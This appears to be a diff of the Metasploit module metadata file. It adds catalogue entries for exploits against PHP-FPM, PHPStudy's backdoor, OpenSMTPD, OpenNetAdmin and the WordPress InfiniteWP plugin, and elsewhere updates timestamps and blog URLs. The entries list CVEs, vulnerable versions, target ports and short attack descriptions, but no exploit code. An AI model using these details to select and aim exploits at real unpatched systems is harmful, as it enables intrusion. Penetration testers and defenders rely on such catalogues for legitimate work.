+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -72680,7 +73044,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/openmediavault_cmd_exec",
@@ -73275,6 +73639,70 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/php_fpm_rce": {
+    "name": "PHP-FPM Underflow RCE",
+    "fullname": "exploit/multi/http/php_fpm_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-10-22",
+    "type": "exploit",
+    "author": [
+      "neex",
+      "cdelafuente-r7"
+    ],
+    "description": "This module exploits an underflow vulnerability in versions 7.1.x\n          below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on\n          Nginx. Only servers with certains Nginx + PHP-FPM configurations are\n          exploitable. This is a port of the original neex's exploit code (see\n          refs.). First, it detects the correct parameters (Query String Length\n          and custom header length) needed to trigger code execution. This step\n          determines if the target is actually vulnerable (Check method). Then,\n          the exploit sets a series of PHP INI directives to create a file\n          locally on the target, which enables code execution through a query\n          string parameter. This is used to execute normal payload stagers.\n          Finally, this module does some cleanup by killing local PHP-FPM\n          workers (those are spawned automatically once killed) and removing\n          the created local file.",
+    "references": [
+      "CVE-2019-11043",
+      "EDB-47553",
+      "URL-https://github.com/neex/phuip-fpizdam",
+      "URL-https://bugs.php.net/bug.php?id=78599",
+      "URL-https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Shell Command"
+    ],
+    "mod_time": "2020-03-06 17:38:37 +0000",
+    "path": "/modules/exploits/multi/http/php_fpm_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/php_fpm_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/php_utility_belt_rce": {
    "name": "PHP Utility Belt Remote Code Execution",
    "fullname": "exploit/multi/http/php_utility_belt_rce",
@@ -73866,6 +74294,55 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/phpstudy_backdoor_rce": {
+    "name": "PHPStudy Backdoor Remote Code execution",
+    "fullname": "exploit/multi/http/phpstudy_backdoor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-20",
+    "type": "exploit",
+    "author": [
+      "Dimensional",
+      "Airevan"
+    ],
+    "description": "This module can detect and exploit the backdoor of PHPStudy.",
+    "references": [
+      "URL-https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHPStudy 2016-2018"
+    ],
+    "mod_time": "2020-03-05 10:24:22 +0000",
+    "path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/phpstudy_backdoor_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/phptax_exec": {
    "name": "PhpTax pfilez Parameter Exec Remote Code Injection",
    "fullname": "exploit/multi/http/phptax_exec",
@@ -74764,7 +75241,7 @@
    "references": [
      "CVE-2013-0156",
      "OSVDB-89026",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
    ],
    "platform": "Ruby",
    "arch": "ruby",
@@ -74787,7 +75264,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/rails_xml_yaml_code_exec",
@@ -76821,7 +77298,7 @@
    "targets": [
      "Trend Micro Threat Discovery Appliance 2.6.1062r1"
    ],
-    "mod_time": "2017-09-07 21:18:50 +0000",
+    "mod_time": "2020-03-24 08:47:21 +0000",
    "path": "/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb",
    "is_install_path": true,
    "ref_name": "multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
@@ -77319,7 +77796,7 @@
    "description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n      Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n      script and execute arbitrary PHP code remotely.\n\n      This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
    "references": [
      "CVE-2013-3591",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -77342,7 +77819,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-08 10:04:47 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vtiger_php_exec",
@@ -77878,7 +78355,7 @@
    "description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n      An authenticated attacker can create a script containing a payload, then a host\n      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n      This module was tested against Zabbix v2.0.9.",
    "references": [
      "CVE-2013-3628",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -77901,7 +78378,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-07 21:18:50 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/zabbix_script_exec",
@@ -80834,7 +81311,7 @@
      "Linux",
      "Mac OS X"
    ],
-    "mod_time": "2020-01-09 15:02:04 +0000",
+    "mod_time": "2020-03-13 09:52:25 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -80970,7 +81447,7 @@
      "CVE-2012-5958",
      "OSVDB-89611",
      "US-CERT-VU-922681",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -80987,7 +81464,7 @@
      "Axis Camera M1011 5.20.1 UPnP/1.4.1",
      "Debug Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
    "is_install_path": true,
    "ref_name": "multi/upnp/libupnp_ssdp_overflow",
@@ -81398,7 +81875,7 @@
    "targets": [
      "Mac OS X"
    ],
-    "mod_time": "2019-02-09 18:46:35 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb",
    "is_install_path": true,
    "ref_name": "osx/browser/adobe_flash_delete_range_tl_op",
@@ -84745,7 +85222,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
+    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Movemail",
      "URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
@@ -84766,7 +85243,7 @@
    "targets": [
      "/usr/lib/crontab.local"
    ],
-    "mod_time": "2018-12-03 12:22:40 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/unix/local/emacs_movemail.rb",
    "is_install_path": true,
    "ref_name": "unix/local/emacs_movemail",
@@ -84862,6 +85339,56 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/local/opensmtpd_oob_read_lpe": {
+    "name": "OpenSMTPD OOB Read Local Privilege Escalation",
+    "fullname": "exploit/unix/local/opensmtpd_oob_read_lpe",
+    "aliases": [
+
+    ],
+    "rank": 200,
+    "disclosure_date": "2020-02-24",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an out-of-bounds read of an attacker-controlled\n        string in OpenSMTPD's MTA implementation to execute a command as the\n        root or nobody user, depending on the kind of grammar OpenSMTPD uses.",
+    "references": [
+      "CVE-2020-8794",
+      "URL-https://seclists.org/oss-sec/2020/q1/96"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD < 6.6.4 (automatic grammar selection)"
+    ],
+    "mod_time": "2020-03-03 16:50:39 +0000",
+    "path": "/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "unix/local/opensmtpd_oob_read_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/local/setuid_nmap": {
    "name": "Setuid Nmap Exploit",
    "fullname": "exploit/unix/local/setuid_nmap",
@@ -85276,7 +85803,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
+    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -85295,7 +85822,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -85306,6 +85833,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/smtp/opensmtpd_mail_from_rce": {
+    "name": "OpenSMTPD MAIL FROM Remote Code Execution",
+    "fullname": "exploit/unix/smtp/opensmtpd_mail_from_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-28",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "This module exploits a command injection in the MAIL FROM field during\n          SMTP interaction with OpenSMTPD to execute a command as the root user.",
+    "references": [
+      "CVE-2020-7247",
+      "URL-https://seclists.org/oss-sec/2020/q1/40"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD < 6.6.1"
+    ],
+    "mod_time": "2020-03-05 14:48:37 +0000",
+    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/smtp/qmail_bash_env_exec": {
    "name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
    "fullname": "exploit/unix/smtp/qmail_bash_env_exec",
@@ -86468,7 +87046,7 @@
      "Drupal 8.x (Unix In-Memory)",
      "Drupal 8.x (Linux Dropper)"
    ],
-    "mod_time": "2019-03-05 18:58:11 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_drupalgeddon2",
@@ -86578,7 +87156,7 @@
      "PHP In-Memory",
      "Unix In-Memory"
    ],
-    "mod_time": "2019-04-24 11:41:30 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_restws_unserialize",
@@ -87748,7 +88326,7 @@
      "URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
      "URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
      "URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
+      "URL-https://blog.rapid7.com/2013/08/15/time-to-patch-joomla"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -87771,7 +88349,7 @@
    "targets": [
      "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
    ],
-    "mod_time": "2018-08-20 15:43:07 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/joomla_media_upload_exec",
@@ -88612,6 +89190,55 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/opennetadmin_ping_cmd_injection": {
+    "name": "OpenNetAdmin Ping Command Injection",
+    "fullname": "exploit/unix/webapp/opennetadmin_ping_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-19",
+    "type": "exploit",
+    "author": [
+      "mattpascoe",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.",
+    "references": [
+      "EDB-47691"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-02-21 15:47:32 +0000",
+    "path": "/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/opennetadmin_ping_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/opensis_modname_exec": {
    "name": "OpenSIS 'modname' PHP Code Execution",
    "fullname": "exploit/unix/webapp/opensis_modname_exec",
@@ -91580,6 +92207,68 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/wp_infinitewp_auth_bypass": {
+    "name": "WordPress InfiniteWP Client Authentication Bypass",
+    "fullname": "exploit/unix/webapp/wp_infinitewp_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-01-14",
+    "type": "exploit",
+    "author": [
+      "WebARX",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an authentication bypass in the WordPress\n        InfiniteWP Client plugin to log in as an administrator and execute\n        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n        The module will attempt to retrieve the original PLUGIN_FILE contents\n        and restore them after payload execution. If VerifyContents is set,\n        which is the default setting, the module will check to see if the\n        restored contents match the original.\n\n        Note that a valid administrator username is required for this module.\n\n        WordPress >= 4.9 is currently not supported due to a breaking WordPress\n        API change. Tested against 4.8.3.",
+    "references": [
+      "WPVDB-10011",
+      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
+      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
+      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "InfiniteWP Client < 1.9.4.5"
+    ],
+    "mod_time": "2020-03-03 13:22:01 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/wp_infusionsoft_upload": {
    "name": "Wordpress InfusionSoft Upload Vulnerability",
    "fullname": "exploit/unix/webapp/wp_infusionsoft_upload",
@@ -92031,7 +92720,7 @@
    "targets": [
      "WordPress"
    ],
-    "mod_time": "2019-11-28 20:13:21 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
@@ -94755,7 +95444,7 @@
      "URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
      "URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
      "URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
+      "URL-https://blog.rapid7.com/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
      "URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
    ],
    "platform": "Windows",
@@ -94776,7 +95465,7 @@
      "IE 8 on Windows 7 SP1",
      "IE 9 on Windows 7 SP1"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_otf_font",
@@ -94897,7 +95586,7 @@
      "BID-53395",
      "URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
      "URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
+      "URL-https://blog.rapid7.com/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
    ],
    "platform": "Windows",
    "arch": "",
@@ -94914,7 +95603,7 @@
      "IE 7 on Windows XP SP3",
      "IE 8 on Windows XP SP3 with msvcrt ROP"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_rtmp",
@@ -96963,7 +97652,7 @@
      "OSVDB-81443",
      "ZDI-12-113",
      "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
+      "URL-https://blog.rapid7.com/2012/07/11/it-isnt-always-about-buffer-overflow"
    ],
    "platform": "Windows",
    "arch": "",
@@ -96978,7 +97667,7 @@
      "Automatic",
      "IE 6 / IE7 (No DEP)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/clear_quest_cqole",
@@ -97687,7 +98376,7 @@
      "CVE-2013-0108",
      "OSVDB-90583",
      "BID-58134",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
+      "URL-https://blog.rapid7.com/2013/03/11/cve-2013-0108-honeywell-ebi",
      "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
    ],
    "platform": "Windows",
@@ -97702,7 +98391,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
@@ -98359,7 +99048,7 @@
      "URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
      "URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
      "URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
+      "URL-https://blog.rapid7.com/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
    ],
    "platform": "Windows",
    "arch": "",
@@ -98377,7 +99066,7 @@
      "IE 8 on Windows Server 2003",
      "IE 8 on Windows 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 09:26:29 +0000",
    "path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ie_cbutton_uaf",
@@ -98611,7 +99300,7 @@
      "MSB-MS13-080",
      "URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
      "URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
+      "URL-https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
    ],
    "platform": "Windows",
    "arch": "",
@@ -98627,7 +99316,7 @@
      "Windows 7 with Office 2007|2010",
      "Windows XP with IE 8"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ie_setmousecapture_uaf",
@@ -101629,7 +102318,7 @@
      "OSVDB-82865",
      "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
      "URL-https://twitter.com/binjo/status/212795802974830592",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
    ],
    "platform": "Windows",
    "arch": "",
@@ -101646,7 +102335,7 @@
      "IE 8 on Windows XP SP3 with JRE ROP",
      "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms12_037_same_id",
@@ -102308,7 +102997,7 @@
      "MSB-MS12-043",
      "URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
      "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
    ],
    "platform": "Windows",
    "arch": "",
@@ -102328,7 +103017,7 @@
      "IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
      "IE 9 with Java 6 on Windows 7 SP1"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/msxml_get_definition_code_exec",
@@ -102974,7 +103663,7 @@
      "OSVDB-81439",
      "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
      "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
+      "URL-https://blog.rapid7.com/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
    ],
    "platform": "Windows",
    "arch": "",
@@ -102992,7 +103681,7 @@
      "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
      "IE 9 with Java 6 on Windows 7 SP1"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/oracle_autovue_setmarkupmode",
@@ -104232,7 +104921,7 @@
      "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
      "Windows 7 + JAVA + DEP bypass (IE8)"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/browser/teechart_pro.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/teechart_pro",
@@ -107379,7 +108068,7 @@
      "metacom",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n        SP3 and Windows 7 SP1.",
+    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n        Manager. The vulnerability exists in the parsing of the UserName\n        parameter in the NetConfig.ini file.\n\n        The module has been tested successfully against version\n        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
    "references": [
      "OSVDB-98714",
      "EDB-28969"
@@ -107396,7 +108085,7 @@
    "targets": [
      "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-02-04 10:05:41 +0000",
    "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -110871,7 +111560,7 @@
      "MSB-MS13-071",
      "BID-62176",
      "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
+      "URL-https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell"
    ],
    "platform": "Windows",
    "arch": "",
@@ -110885,7 +111574,7 @@
    "targets": [
      "Windows XP SP3 / Windows 2003 SP2"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms13_071_theme",
